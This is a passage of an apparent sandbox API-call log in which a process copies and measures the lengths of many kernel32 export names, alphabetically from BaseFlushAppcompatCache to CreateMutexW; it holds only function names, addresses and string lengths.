out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.830] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.830] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.830] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.830] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.830] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.830] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.830] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.830] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.830] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.830] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.830] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.830] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.830] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.830] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.830] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.830] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.830] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.830] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.830] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.831] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.831] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.831] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.831] lstrlenA (lpString="BEEP") returned 4 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.831] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.831] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.831] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.831] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.831] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.831] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.831] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.831] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.831] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.831] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.831] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.831] lstrlenA (lpString="CANCELIO") returned 8 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.831] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0078.831] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0078.831] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0078.831] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0078.832] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0078.832] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0078.832] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0078.832] lstrlenA (lpString="CHECKELEVATION") returned 14 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0078.832] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0078.832] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0078.832] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0078.832] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0078.832] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0078.832] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0078.832] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0078.832] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0078.832] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0078.832] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0078.832] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0078.832] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0078.832] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0078.832] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0078.832] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0078.833] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0078.833] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0078.833] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0078.833] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0078.833] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0078.833] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0078.833] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0078.833] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0078.833] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0078.833] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0078.833] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0078.833] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0078.833] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0078.833] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0078.833] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0078.833] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0078.833] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0078.833] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0078.833] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0078.834] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0078.834] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0078.834] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0078.834] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0078.834] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0078.834] lstrlenA (lpString="COPYCONTEXT") returned 11 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0078.834] lstrlenA (lpString="COPYFILEA") returned 9 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0078.834] lstrlenA (lpString="COPYFILEEXA") returned 11 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0078.834] lstrlenA (lpString="COPYFILEEXW") returned 11 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0078.834] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0078.834] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0078.834] lstrlenA (lpString="COPYFILEW") returned 9 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0078.834] lstrlenA (lpString="COPYLZFILE") returned 10 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0078.834] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0078.834] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0078.834] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0078.834] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0078.834] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0078.834] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0078.834] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0078.835] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0078.835] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0078.835] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0078.835] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0078.835] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0078.835] lstrlenA (lpString="CREATEEVENTA") returned 12 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0078.835] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0078.835] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0078.835] lstrlenA (lpString="CREATEEVENTW") returned 12 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0078.835] lstrlenA (lpString="CREATEFIBER") returned 11 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0078.835] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0078.835] lstrlenA (lpString="CREATEFILEA") returned 11 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0078.835] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0078.835] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0078.835] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0078.835] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0078.835] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0078.835] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0078.835] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0078.836] lstrlenA (lpString="CREATEFILEW") returned 11 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0078.836] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0078.836] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0078.836] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0078.836] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0078.836] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0078.836] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0078.836] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0078.836] lstrlenA (lpString="CREATEJOBSET") returned 12 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0078.836] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0078.836] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0078.836] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0078.836] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0078.836] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0078.836] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0078.836] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0078.836] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0078.836] lstrcpyA (in: 